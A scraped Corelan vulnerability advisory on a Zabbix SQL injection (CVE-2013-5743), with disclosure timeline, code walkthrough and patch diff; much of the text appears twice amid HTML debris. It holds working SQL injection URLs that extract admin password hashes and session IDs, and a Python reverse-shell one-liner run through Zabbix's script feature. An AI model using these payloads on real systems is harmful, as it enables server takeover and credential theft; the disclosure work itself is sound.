First, a little background.<\/p>\n
<\/p>\n
Disclosure Timeline:<\/h3>\n\n- 9\/11\/2013: Corelan contacts vendor for support contact<\/li>\n
- 9\/12\/2013: vendor replies back with lead dev contact information<\/li>\n
- 9\/16\/2013: Corelan makes initial contact with lead dev and asks vendor to agree with disclosure terms<\/li>\n
- 9\/16\/2013: Vendor agrees and asks for more information about the bug<\/li>\n
- 9\/16\/2013: Corelan sends bug report to vendor<\/li>\n
- 9\/23\/2013: Vendor confirms bug<\/li>\n
- 10\/2\/2013: Patch released by vendor<\/li>\n<\/ul>\n
Corelan would like to thank the Zabbix development team for being very responsive and quick to fix the issue.<\/p>\n
<\/p>\n
On Wednesday, October 2nd Zabbix released patch ZBX-7091 to address this and several other SQL Injection related issues. Further details regarding this patch can be found at the following URL:<\/p>\n
https:\/\/support.zabbix.com\/browse\/ZBX-7091<\/a><\/p>\nThe CVE assigned to this vulnerability is CVE-2013-5743. There are other vulnerabilities that were combined with this CVE. Bernhard Schildendorfer from SEC Consultant Vulnerability lab also found SQL injection points through the Zabbix APIs. His advisory can be found here:<\/p>\n
http:\/\/packetstormsecurity.com\/files\/123511\/SA-20131004-0.txt<\/a><\/p>\n <\/p>\n
Vendor Details<\/h3>\n
Zabbix is an open source, agent-based, monitoring and alert application used to correlate data from a wide range of clients. It's written in PHP and supports commonly user SQL databases like MySQL, PostgreSQL, and Orcale.<\/p>\n
From the vendor\u2019s site (http:\/\/www.zabbix.com<\/a>):<\/p>\n\n <\/p>\n
ZABBIX team's mission is to make a superior monitoring solution available and affordable for all.<\/p>\n
The company's flagship product is ZABBIX, one of the most popular open source monitoring software in the world. It is already used by a vast number of companies, who have chosen it due to real scalability, high and robust performance, ease of use and extremely low costs of ownership.<\/p>\n<\/blockquote>\n
<\/p>\n
<\/p>\n
Vulnerability Details<\/h3>\n
This particular vulnerability affects the httpmon.php script which, by default, is accessible via an unauthenticated session. This is due in part, to the fact that Zabbix comes preconfigured with a \u201cguest\u201d user account which is permitted \u201cZabbix user\u201d level permissions. With this, any unauthenticated request to a resource that is accessible with \u201cZabbix user\u201d permissions, the session ID of that request will automatically be associated with the \u201cguest\u201d user, effectively authenticating that user as \u201cguest\u201d. If the \u201cguest\u201d account has been disabled, valid account credentials will be required in order to trigger this vulnerability. <\/p>\n
In case you're wondering, you can disable the guest account from the admin panel.<\/p>\n
Looking at the screenshot below, we can see here that the applications parameter is susceptible to SQL Injection due to the lack of input validation applied to the \u201capplications\u201d parameter. By inserting a single quote (\u2018), the intended SQL query is escaped, throwing an exception error from the MySQL database server.<\/p>\n
<\/p>\n
![\"zabbix1\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2013\/10\/zabbix1_thumb2.png\" "\\"zabbix1\\"")
<\/a>
To determine the cause of this issue, we can follow the code path from the point in which the GET parameter is parsed.<\/p>\nHere we can see that our user supplied value is parsed from the URL request and assigned to the $application variable. Next, the add2favorites() function is then called:<\/p>\n
foreach ($_REQUEST['applications'] as $application) { \n add2favorites('web.httpmon.applications', $application); \n }<\/pre>\nLooking at the add2favorites function, we can see that $application variable is now referenced as $favid, which in turn is inserted into the $values array.<\/strong> <\/em><\/p>\nfunction add2favorites($favobj, $favid<\/font><\/strong>, $source = null) { \n $favorites = get_favorites($favobj); \n \n\n foreach ($favorites as $favorite) { \n if ($favorite['source'] == $source && $favorite['value'] == $favid) { \n return true; \n } \n } \n DBstart(); \n $values = array( \n 'profileid' => get_dbid('profiles', 'profileid'), \n 'userid' => CWebUser::$data['userid'], \n 'idx' => zbx_dbstr($favobj), \n 'value_id' => $favid,<\/strong><\/font>\n 'type' => PROFILE_TYPE_ID \n);<\/pre>\nThe $values array <\/strong>is then used <\/strong>as part of an in-line SQL query. Looking at the code sample below,<\/strong> we can again see that no sanitization of our data has been performed prior to passing it as part of our SQL query.<\/p>\nreturn DBend(DBexecute('INSERT INTO profiles ('.implode(', ', array_keys($values)<\/font><\/strong>).') VALUES ('.implode(', ', $values).')'));<\/pre>\n <\/p>\n
The patch<\/h3>\n
After reviewing the changes implemented by this patch, we can see that $values now calls the function \u201czbx_dbstr\u201d prior to executing our previously vulnerable SQL query:<\/p>\n
Index: frontends\/php\/include\/profiles.inc.php\n===================================================================\n--- frontends\/php\/include\/profiles.inc.php\t(revision 38884)\n+++ frontends\/php\/include\/profiles.inc.php\t(working copy)\n@@ -148,9 +148,9 @@\n \t\t\t'profileid' => get_dbid('profiles', 'profileid'),\n \t\t\t'userid' => self::$userDetails['userid'],\n \t\t\t'idx' => zbx_dbstr($idx),\n-\t\t\t$value_type => ($value_type == 'value_str') ? zbx_dbstr($value) : $value,\n-\t\t\t'type' => $type,\n-\t\t\t'idx2' => $idx2\n+\t\t\t$value_type => zbx_dbstr($value),<\/font><\/strong>\n+\t\t\t'type' => zbx_dbstr($type),\n+\t\t\t'idx2' => zbx_dbstr($idx2)\n \t\t);\n \t\treturn DBexecute('INSERT INTO profiles ('.implode(', ', array_keys($values)).') VALUES ('.implode(', ', $values).')');\/\/ string value prepearing\n\nif (isset($DB['TYPE']) && $DB['TYPE'] == ZBX_DB_MYSQL) {\n function zbx_dbstr($var) {\n if (is_array($var)) {\n foreach ($var as $vnum => $value) {\n $var[$vnum] = "'".mysql_real_escape_string($value)."'";\n }\n return $var;\n }\n return "'".mysql_real_escape_string($var)."'";\n }<\/font><\/strong><\/pre>\nTo apply the patch simply copy it to the downloaded directory of Zabbix (~\/Downloads\/zabbix-2.0.8\/frontends) and run:<\/p>\n
patch -p1 <<\/span>fix.patch<\/span><\/pre>\nThen copy the patched files over to your web directory:<\/p>\n
sudo cp \u2013r .\/* \/var\/www\/zabbix\/<\/pre>\n <\/h3>\nLeveraging SQL Injection<\/h3>\n
Generally at this time I am firing up sqlmap<\/a> and doing my happy dance!<\/p>\nUsing the following query, we can extract the Administrator username and hash from the users table:<\/p>\n
http:\/\/zabbix.server\/zabbix\/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29<\/pre>\n <\/p>\n
![\"zabbix2\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2013\/10\/zabbix2_thumb1.png\" "\\"zabbix2\\"")
<\/a><\/p>\nGreat! With this we can crack the md5 password and login as Admin! However, what if the password takes too long to crack and the user created a complex password?<\/p>\n
It was discovered during the assessment that the session identification (sid) for all users, including Admin, is stored in the Zabbix database in the sessions table. They appear to never be discarded unless specified by the Administrator (Auto-Logout which is disabled by default).<\/p>\n
The following is a screen shot of the Zabbix server displaying the values for the table sessions. The query is looking for the Admin session id\u2019s, which is user id 1. Status 0 will indicate an active session IDs not in use.<\/p>\n
![\"zabbix3\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2013\/10\/zabbix3_thumb1.png\" "\\"zabbix3\\"")
<\/a><\/p>\nIt is possible to reuse one of these sessions id\u2019s, and bypass authentication, without knowing the Admin password. The same SQL injection technique used before can extract a valid session ID from the database.<\/p>\n
Using the following query, we can extract the Administrator session ID from the sessions table:<\/p>\n
http:\/\/zabbix.server\/zabbix\/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28sessionid,0x7e,userid,0x7e,status%29%20as%20char%29,0x7e%29%29%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29<\/pre>\n![\"zabbix4\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2013\/10\/zabbix4_thumb1.png\" "\\"zabbix4\\"")
<\/a><\/p>\nIt is then possible to replace the existing session ID in the cookie field with the one extracted to elevate the browser session with Administrative privileges.<\/p>\n
Example: SID = a7c3f4f6be308b74585f7cdf9d5f7650<\/p>\n
![\"zabbix5\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2013\/10\/zabbix5_thumb2.png\" "\\"zabbix5\\"")
<\/a><\/p>\n![\"zabbix6\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2013\/10\/zabbix6_thumb2.png\" "\\"zabbix6\\"")
<\/a><\/p>\n <\/p>\n
<\/p>\n
Cool! We got Admin, now what?<\/h3>\n
One of Zabbix\u2019s built-in features allow user\u2019s to execute scripts on the server and agents it controls for monitoring purposes. We can leverage this built-in functionality in order to further our attack.<\/p>\n
Further information on Zabbix\u2019s script execution interface can be found at the following URL:<\/p>\n
https:\/\/www.zabbix.com\/documentation\/2.2\/manual\/web_interface\/frontend_sections\/administration\/scripts<\/a><\/p>\n <\/p>\n
![\"zabbix7\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2013\/10\/zabbix7_thumb2.png\" "\\"zabbix7\\"")
<\/a><\/p>\nAs we already have administrator permissions, we can deploy a script that will execute on the underlying operating system and since nearly every modern Linux distribution comes preconfigured with either Perl or Python (or both), we can abuse this in order to trigger a reverse shell from our target host back to us.<\/strong> <\/p>\nExecuting the following Python script from @pentestmonkey, will provide us with a remote command shell.<\/p>\n
http:\/\/pentestmonkey.net\/cheat-sheet\/shells\/reverse-shell-cheat-sheet<\/a><\/p>\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["\/bin\/sh","-i"]);'<\/pre>\n <\/p>\n
![\"zabbix8\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2013\/10\/zabbix8_thumb2.png\" "\\"zabbix8\\"")
<\/a><\/p>\n![\"zabbix9\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2013\/10\/zabbix9_thumb2.png\" "\\"zabbix9\\"")
<\/a><\/p>\n <\/p>\n
Now the question is, how do we trigger the script we saved on the server?<\/p>\n
<\/p>\n
Code Execution<\/h3>\n
Fortunately for us, Zabbix includes the scripts_exec.php script in order to trigger the execution of our command shell. However, in order to do so we\u2019ll need to provide it with the correct parameters:<\/p>\n
The scripts_exec.php requires the following URL parameters to execute: <\/p>\n
\n- execute = 1<\/strong><\/li>\n
- scriptid = 4<\/strong><\/li>\n
\n- The value is the number of scripts stored in scripts table in the database. This can be guessed, or enumerated with SQL injection. The default number of scripts in Zabbix is 3, so the next one would be 4.<\/em><\/li>\n<\/ul>\n
- sid = 585f7cdf9d5f7650<\/strong><\/li>\n
\n- The last 16 characters in the session id. sid = a7c3f4f6be308b74585f7cdf9d5f7650<\/em><\/li>\n<\/ul>\n
- hostid = 10084<\/strong><\/li>\n
\n- The value of host id can be found in the interface table in the database. This can be guessed, or enumerated with SQL injection. The default value of the Zabbix server (127.0.0.1) is 10084.<\/em><\/li>\n<\/ul>\n<\/ul>\n
Now time to test our script out and see if we can get code execution:<\/p>\n
http:\/\/zabbix.server\/zabbix\/scripts_exec.php?execute=1&scriptid=4&sid=585f7cdf9d5f7650&hostid=10084<\/p>\n
![\"zabbix10\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2013\/10\/zabbix10_thumb1.png\" "\\"zabbix10\\"")
<\/a><\/p>\n <\/p>\n
Woot! So we were able to get code execution through extracting the Administrator session ID and then creating our own script to give us a remote shell.<\/p>\n
<\/p>\n
Pyoor, a team member of Corelan, was nice enough to put everything together in a Metasploit module.<\/a><\/p>\n![\"zabbix_metasploit_1\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2013\/10\/zabbix_metasploit_1_thumb.png\" "\\"zabbix_metasploit_1\\"")
<\/a><\/p>\n <\/h3>\nFurther Exploitation?<\/h3>\n
It was also discovered that it is possible through the scripts functionality in Zabbix to execute the same commands on all agents associated with the Zabbix server. The one condition is they have to have the following configuration parameter turned on, which is off by default<\/u>.<\/p>\n
https:\/\/www.zabbix.com\/documentation\/2.0\/manual\/config\/notifications\/action\/operation\/remote_command<\/a><\/p>\nzabbix_agentd.conf:<\/p>\n
### Option: EnableRemoteCommands\n# Whether remote commands from Zabbix server are allowed.\n# 0 - not allowed\n# 1 - allowed\n#\n# Mandatory: no\n# Default:\n# EnableRemoteCommands=0<\/pre>\n <\/p>\n
However, it is not unusual for system administrators to enable the remote commands option in the agents.<\/p>\n
Lets go ahead through the theory. First we would need to extract the agent from the interface table.<\/p>\n
![\"zabbix11\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2013\/10\/zabbix11_thumb1.png\" "\\"zabbix11\\"")
<\/a><\/p>\nWe can see that we have an agent running on IP 192.168.2.9 with a hostid of 10085. Next we will create a sample script to see if remote commands is enabled. This is actually very easy to test since the server command and agent response is sent in clear text.<\/p>\n
![\"zabbix12\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2013\/10\/zabbix12_thumb2.png\" "\\"zabbix12\\"")
<\/a><\/p>\nNext we have the Zabbix server execute the script (using the same scripts_exe.php script) and we can see the results over Wireshark:<\/p>\n
![\"zabbix13\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2013\/10\/zabbix13_thumb2.png\" "\\"zabbix13\\"")
<\/a><\/p>\nWith remote commands disabled we can see that it does not execute the script. If we go ahead and enable remote commands on the agent and try the script again:<\/p>\n
![\"zabbix14\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2013\/10\/zabbix14_thumb2.png\" "\\"zabbix14\\"")
<\/a><\/p>\nExcellent! So if we have remote commands enabled on the agent it is then possible get a shell on the agent through the Zabbix server. All we need to do is:<\/p>\n
\n- Extract hostid from interface table<\/li>\n
- Create script with agent hostid and modify few options in the script functionality (choose execute on zabbix agent instead of server)<\/li>\n
- Test remote commands is enabled<\/li>\n
- Execute script<\/li>\n<\/ul>\n
If we modify our Metasploit script:<\/p>\n
Corelan would like to thank the Zabbix development team for being very responsive and quick to fix the issue.<\/p>\n
<\/p>\n
On Wednesday, October 2nd Zabbix released patch ZBX-7091 to address this and several other SQL Injection related issues. Further details regarding this patch can be found at the following URL:<\/p>\n
https:\/\/support.zabbix.com\/browse\/ZBX-7091<\/a><\/p>\n The CVE assigned to this vulnerability is CVE-2013-5743. There are other vulnerabilities that were combined with this CVE. Bernhard Schildendorfer from SEC Consultant Vulnerability lab also found SQL injection points through the Zabbix APIs. His advisory can be found here:<\/p>\n http:\/\/packetstormsecurity.com\/files\/123511\/SA-20131004-0.txt<\/a><\/p>\n <\/p>\n Zabbix is an open source, agent-based, monitoring and alert application used to correlate data from a wide range of clients. It's written in PHP and supports commonly user SQL databases like MySQL, PostgreSQL, and Orcale.<\/p>\n From the vendor\u2019s site (http:\/\/www.zabbix.com<\/a>):<\/p>\n <\/p>\n ZABBIX team's mission is to make a superior monitoring solution available and affordable for all.<\/p>\n The company's flagship product is ZABBIX, one of the most popular open source monitoring software in the world. It is already used by a vast number of companies, who have chosen it due to real scalability, high and robust performance, ease of use and extremely low costs of ownership.<\/p>\n<\/blockquote>\n <\/p>\n <\/p>\n This particular vulnerability affects the httpmon.php script which, by default, is accessible via an unauthenticated session. This is due in part, to the fact that Zabbix comes preconfigured with a \u201cguest\u201d user account which is permitted \u201cZabbix user\u201d level permissions. With this, any unauthenticated request to a resource that is accessible with \u201cZabbix user\u201d permissions, the session ID of that request will automatically be associated with the \u201cguest\u201d user, effectively authenticating that user as \u201cguest\u201d. If the \u201cguest\u201d account has been disabled, valid account credentials will be required in order to trigger this vulnerability. <\/p>\n In case you're wondering, you can disable the guest account from the admin panel.<\/p>\n Looking at the screenshot below, we can see here that the applications parameter is susceptible to SQL Injection due to the lack of input validation applied to the \u201capplications\u201d parameter. By inserting a single quote (\u2018), the intended SQL query is escaped, throwing an exception error from the MySQL database server.<\/p>\n <\/p>\n Here we can see that our user supplied value is parsed from the URL request and assigned to the $application variable. Next, the add2favorites() function is then called:<\/p>\n Looking at the add2favorites function, we can see that $application variable is now referenced as $favid, which in turn is inserted into the $values array.<\/strong> <\/em><\/p>\n The $values array <\/strong>is then used <\/strong>as part of an in-line SQL query. Looking at the code sample below,<\/strong> we can again see that no sanitization of our data has been performed prior to passing it as part of our SQL query.<\/p>\n <\/p>\n After reviewing the changes implemented by this patch, we can see that $values now calls the function \u201czbx_dbstr\u201d prior to executing our previously vulnerable SQL query:<\/p>\n To apply the patch simply copy it to the downloaded directory of Zabbix (~\/Downloads\/zabbix-2.0.8\/frontends) and run:<\/p>\n Then copy the patched files over to your web directory:<\/p>\n Generally at this time I am firing up sqlmap<\/a> and doing my happy dance!<\/p>\n Using the following query, we can extract the Administrator username and hash from the users table:<\/p>\n <\/p>\n Great! With this we can crack the md5 password and login as Admin! However, what if the password takes too long to crack and the user created a complex password?<\/p>\n It was discovered during the assessment that the session identification (sid) for all users, including Admin, is stored in the Zabbix database in the sessions table. They appear to never be discarded unless specified by the Administrator (Auto-Logout which is disabled by default).<\/p>\n The following is a screen shot of the Zabbix server displaying the values for the table sessions. The query is looking for the Admin session id\u2019s, which is user id 1. Status 0 will indicate an active session IDs not in use.<\/p>\n It is possible to reuse one of these sessions id\u2019s, and bypass authentication, without knowing the Admin password. The same SQL injection technique used before can extract a valid session ID from the database.<\/p>\n Using the following query, we can extract the Administrator session ID from the sessions table:<\/p>\n It is then possible to replace the existing session ID in the cookie field with the one extracted to elevate the browser session with Administrative privileges.<\/p>\n Example: SID = a7c3f4f6be308b74585f7cdf9d5f7650<\/p>\n <\/p>\n <\/p>\n One of Zabbix\u2019s built-in features allow user\u2019s to execute scripts on the server and agents it controls for monitoring purposes. We can leverage this built-in functionality in order to further our attack.<\/p>\n Further information on Zabbix\u2019s script execution interface can be found at the following URL:<\/p>\n https:\/\/www.zabbix.com\/documentation\/2.2\/manual\/web_interface\/frontend_sections\/administration\/scripts<\/a><\/p>\n <\/p>\n As we already have administrator permissions, we can deploy a script that will execute on the underlying operating system and since nearly every modern Linux distribution comes preconfigured with either Perl or Python (or both), we can abuse this in order to trigger a reverse shell from our target host back to us.<\/strong> <\/p>\n Executing the following Python script from @pentestmonkey, will provide us with a remote command shell.<\/p>\n http:\/\/pentestmonkey.net\/cheat-sheet\/shells\/reverse-shell-cheat-sheet<\/a><\/p>\n <\/p>\n <\/p>\n Now the question is, how do we trigger the script we saved on the server?<\/p>\n <\/p>\n Fortunately for us, Zabbix includes the scripts_exec.php script in order to trigger the execution of our command shell. However, in order to do so we\u2019ll need to provide it with the correct parameters:<\/p>\n The scripts_exec.php requires the following URL parameters to execute: <\/p>\n Now time to test our script out and see if we can get code execution:<\/p>\n http:\/\/zabbix.server\/zabbix\/scripts_exec.php?execute=1&scriptid=4&sid=585f7cdf9d5f7650&hostid=10084<\/p>\n <\/p>\n Woot! So we were able to get code execution through extracting the Administrator session ID and then creating our own script to give us a remote shell.<\/p>\n <\/p>\n Pyoor, a team member of Corelan, was nice enough to put everything together in a Metasploit module.<\/a><\/p>\n It was also discovered that it is possible through the scripts functionality in Zabbix to execute the same commands on all agents associated with the Zabbix server. The one condition is they have to have the following configuration parameter turned on, which is off by default<\/u>.<\/p>\n https:\/\/www.zabbix.com\/documentation\/2.0\/manual\/config\/notifications\/action\/operation\/remote_command<\/a><\/p>\n zabbix_agentd.conf:<\/p>\n <\/p>\n However, it is not unusual for system administrators to enable the remote commands option in the agents.<\/p>\n Lets go ahead through the theory. First we would need to extract the agent from the interface table.<\/p>\n We can see that we have an agent running on IP 192.168.2.9 with a hostid of 10085. Next we will create a sample script to see if remote commands is enabled. This is actually very easy to test since the server command and agent response is sent in clear text.<\/p>\n Next we have the Zabbix server execute the script (using the same scripts_exe.php script) and we can see the results over Wireshark:<\/p>\n With remote commands disabled we can see that it does not execute the script. If we go ahead and enable remote commands on the agent and try the script again:<\/p>\n Excellent! So if we have remote commands enabled on the agent it is then possible get a shell on the agent through the Zabbix server. All we need to do is:<\/p>\n If we modify our Metasploit script:<\/p>\nVendor Details<\/h3>\n
\n
Vulnerability Details<\/h3>\n
<\/a>
To determine the cause of this issue, we can follow the code path from the point in which the GET parameter is parsed.<\/p>\nforeach ($_REQUEST['applications'] as $application) { \n add2favorites('web.httpmon.applications', $application); \n }<\/pre>\nfunction add2favorites($favobj, $favid<\/font><\/strong>, $source = null) { \n $favorites = get_favorites($favobj); \n \n\n foreach ($favorites as $favorite) { \n if ($favorite['source'] == $source && $favorite['value'] == $favid) { \n return true; \n } \n } \n DBstart(); \n $values = array( \n 'profileid' => get_dbid('profiles', 'profileid'), \n 'userid' => CWebUser::$data['userid'], \n 'idx' => zbx_dbstr($favobj), \n 'value_id' => $favid,<\/strong><\/font>\n 'type' => PROFILE_TYPE_ID \n);<\/pre>\nreturn DBend(DBexecute('INSERT INTO profiles ('.implode(', ', array_keys($values)<\/font><\/strong>).') VALUES ('.implode(', ', $values).')'));<\/pre>\nThe patch<\/h3>\n
Index: frontends\/php\/include\/profiles.inc.php\n===================================================================\n--- frontends\/php\/include\/profiles.inc.php\t(revision 38884)\n+++ frontends\/php\/include\/profiles.inc.php\t(working copy)\n@@ -148,9 +148,9 @@\n \t\t\t'profileid' => get_dbid('profiles', 'profileid'),\n \t\t\t'userid' => self::$userDetails['userid'],\n \t\t\t'idx' => zbx_dbstr($idx),\n-\t\t\t$value_type => ($value_type == 'value_str') ? zbx_dbstr($value) : $value,\n-\t\t\t'type' => $type,\n-\t\t\t'idx2' => $idx2\n+\t\t\t$value_type => zbx_dbstr($value),<\/font><\/strong>\n+\t\t\t'type' => zbx_dbstr($type),\n+\t\t\t'idx2' => zbx_dbstr($idx2)\n \t\t);\n \t\treturn DBexecute('INSERT INTO profiles ('.implode(', ', array_keys($values)).') VALUES ('.implode(', ', $values).')');\/\/ string value prepearing\n\nif (isset($DB['TYPE']) && $DB['TYPE'] == ZBX_DB_MYSQL) {\n function zbx_dbstr($var) {\n if (is_array($var)) {\n foreach ($var as $vnum => $value) {\n $var[$vnum] = "'".mysql_real_escape_string($value)."'";\n }\n return $var;\n }\n return "'".mysql_real_escape_string($var)."'";\n }<\/font><\/strong><\/pre>\npatch -p1 <<\/span>fix.patch<\/span><\/pre>\nsudo cp \u2013r .\/* \/var\/www\/zabbix\/<\/pre>\n
<\/h3>\n
Leveraging SQL Injection<\/h3>\n
http:\/\/zabbix.server\/zabbix\/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29<\/pre>\n
<\/a><\/p>\n<\/a><\/p>\nhttp:\/\/zabbix.server\/zabbix\/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28sessionid,0x7e,userid,0x7e,status%29%20as%20char%29,0x7e%29%29%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29<\/pre>\n
<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\nCool! We got Admin, now what?<\/h3>\n
<\/a><\/p>\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["\/bin\/sh","-i"]);'<\/pre>\n<\/a><\/p>\n<\/a><\/p>\nCode Execution<\/h3>\n
\n
\n
\n
\n
<\/a><\/p>\n<\/a><\/p>\n <\/h3>\n
Further Exploitation?<\/h3>\n
### Option: EnableRemoteCommands\n# Whether remote commands from Zabbix server are allowed.\n# 0 - not allowed\n# 1 - allowed\n#\n# Mandatory: no\n# Default:\n# EnableRemoteCommands=0<\/pre>\n
<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n\n
![\"zabbix15\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2013\/10\/zabbix15_thumb2.png\" "\\"zabbix15\\"")
<\/a><\/p>\n